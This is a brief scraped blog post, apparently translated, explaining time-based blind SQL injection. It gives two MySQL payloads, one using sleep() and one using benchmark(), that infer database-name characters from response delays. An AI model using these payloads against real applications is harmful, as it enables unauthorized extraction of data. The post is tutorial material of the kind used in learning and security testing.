SQL blind injection time injection

Others 2022-04-21 22:05:30 views: 0

1. Use the sleep() function for injection 

  payload:and if(ascii(substr(database(),1,1))=115,1,sleep(5))%23

  

2. When there is an error, there will be a time delay of 5 seconds, and use benchmark() to perform delay injection

  payload:union select (if(substring(current,1,1)=char(115),benchmark(50000000,encode('MSG','by 5 seconds')),null)),2,3 from (select database() as current) as tb1%23

  

When the result is correct, run ENCODE('MSG','by 5 seconds') 50000000 times, which will take a while.

 

  

  

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=324620117&siteId=291194637
Recommended
Domestic cloud input method - only Huawei has no cloud data upload security issues
Open Source Daily | Industrial open source project OGG 1.0; Sister, do you want to configure Firefox with me? Apple AI is far behind? Fedora 40
Ranking
Deploy Tomcat (Web) services Comments
jquery: event mechanism bind() on()
The simple and easy-to-understand basic encapsulation module makes Web testing easier!
Oracle Database on Linux solutions Chinese garbled
Talk about the REST API of Eureka Server
Instructions for companies applying for ISO certification
Spring mvc framework adds encryption/decryption of messages
Transport layer protocol-introduction of TCP protocol and the process of three-way handshake and four-time disconnection, and the difference with UDP protocol
MockMvc and Mockito - java.lang.AssertionError: JSON path "$" Expected: a collection with size <2> but: collection size was <0>
Redis cluster creation
Daily
More
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(31)
2024-04-16(23)
2024-04-15(5)

Code World

© 2018 codetd.com